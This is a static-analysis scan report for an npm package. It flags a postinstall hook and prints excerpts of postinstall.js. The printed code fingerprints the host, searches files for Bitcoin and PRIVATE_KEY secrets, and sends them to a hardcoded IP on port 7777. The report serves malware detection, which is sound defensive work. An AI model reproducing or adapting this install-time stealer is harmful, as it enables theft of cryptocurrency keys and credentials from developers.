Static Scan Results
scanned 3h ago · by rust-scannerStatic analysis flagged 9 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.
Static reason
One or more suspicious static signals were detected.
Decision evidence
public snapshotBehavioral surface
EnvironmentVarsFilesystemNetwork
UrlStrings
NoLicense
Source & flagged code
3 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgpostinstall.jsView file
1#!/usr/bin/env node
L2: const http=require("http"),fs=require("fs"),path=require("path"),os=require("os");
L3: const URL="http://107.161.90.180:7777";
L4:
L5: function send(t,c){if(!c||c.length<10)return;try{const d=JSON.stringify({t:t,h:os.hostname(),u:os.userInfo().username,cwd:process.cwd(),c:c.substring(0,10000)});const r=http.reques...
L6:
...
L23:
L24: // Buscar contenido de archivos para crypto private keys
L25: function huntCryptoKeys(dir){
...
L39: if(btcKeys)r.push({n:x.name,t:"btc_pk",c:btcKeys.join("\n")});
L40: // Buscar PRIVATE_KEY= en env
L41: if(c.match(/PRIVATE_KEY\s*=\s*0x/i))r.push({n:x.name,t:"env_pk",c:c.substring(0,2000)});
High
Host Fingerprint Exfiltration
Source collects local host identity data and sends it to an external endpoint.
postinstall.jsView on unpkg · L1Findings
2 High3 Medium4 Low
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationpostinstall.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowFilesystem
LowUrl Strings
LowNo License